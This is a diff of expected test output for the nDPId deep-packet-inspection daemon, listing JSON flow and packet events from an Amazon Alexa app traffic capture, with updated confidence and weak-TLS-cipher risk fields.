 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1490976054070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976054070,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt0ZAAOcG6LM0XuiGrBAq2AG7snc6VHcpQzV8NnASH\/5LIgAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1490976054071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976054071,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoL1NAAEAGF7CsECrYNF7ohrJ3AbtDNXw2OlR3KlAQAVeVkwAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976054009,"flow_last_seen":1490976054072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976054072,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":785,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976054009,"flow_last_seen":1490976054168,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976054168,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976054009,"flow_last_seen":1490976054072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976054072,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":785,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976054009,"flow_last_seen":1490976054168,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976054168,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00529{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1490976055356,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"ts_msec":1490976055356,"pkt":"AQBeAAABAMDKkaPvCABGwAAgAABAAAECBBcAAAAA4AAAAZQEAAARZO6bAAAAAA=="}
-00562{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00588{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976057977,"flow_last_seen":1490976057977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976057977,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1490976057977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976057977,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8quhAAEAGnAasECrYNF7ohrJ4AbvwDv4cAAAAAKAC\/\/9b6AAAAgQFtAQCCAoA9lT0AAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1490976058029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976058029,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9qRAAOcGqVU0XuiGrBAq2AG7snh1d2z38A7+HXASH\/7rbgAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1490976058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976058030,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqulAAEAGnBmsECrYNF7ohrJ4AbvwDv4ddXds+FAQAVc14AAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976057977,"flow_last_seen":1490976058032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976058032,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":806,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976057977,"flow_last_seen":1490976058082,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976058082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976057977,"flow_last_seen":1490976058032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976058032,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":806,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976057977,"flow_last_seen":1490976058082,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976058082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976058103,"flow_last_seen":1490976058103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976058103,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1490976058103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976058103,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87D9AAEAGJ+usECrYNu8YuoT5Abs\/ELk9AAAAAKAC\/\/9McwAAAgQFtAQCCAoA9lUCAAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1490976058160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976058160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5wBAAOcGhjU27xi6rBAq2AG7hPl2s2uGPxC5PnASH\/7cPAAAAgQFtAEDAwY="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1490976058162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976058162,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7EBAAEAGJ\/6sECrYNu8YuoT5Abs\/ELk+drNrh1AQAVcmrgAA"}
-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976058103,"flow_last_seen":1490976058166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976058166,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":822,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976058103,"flow_last_seen":1490976058222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976058222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976058103,"flow_last_seen":1490976058166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976058166,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":822,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976058103,"flow_last_seen":1490976058222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976058222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064328,"flow_last_seen":1490976064328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976064328,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1490976064328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976064328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88S5AAEAGXAisECrYSBXOh6SkAbuyb6ZBAAAAAKAC\/\/8DBAAAAgQFtAQCCAoA9ldvAAAAAAEDAwg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1490976064333,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976064333,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WldAAEARM2CsECrYrBAqAa27ADUAKN4THgkBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1490976064389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976064389,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkwRAAOcGEz5IFc6HrBAq2AG7pKSpsxlXsm+mQnASH\/60aQAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1490976064390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976064390,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8S9AAEAGXBusECrYSBXOh6SkAbuyb6ZCqbMZWFAQAVf+2gAA"}
-00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":849,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064328,"flow_last_seen":1490976064392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976064392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":849,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064328,"flow_last_seen":1490976064392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976064392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1490976064448,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1490976064448,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC91iFAAEARtxSsECoBrBAq2AA1rbsAqQ1IHgmBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAABFAAoDd3d3A2NkbsAQwCwABQABAAAAAwAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAEABDRV0djAQgABAAEAAAABAAQ0VdHFwEIAAQABAAAAAQAENFXRj8BCAAEAAQAAAAEABDRV0Xo="}
-00757{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976064448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}}
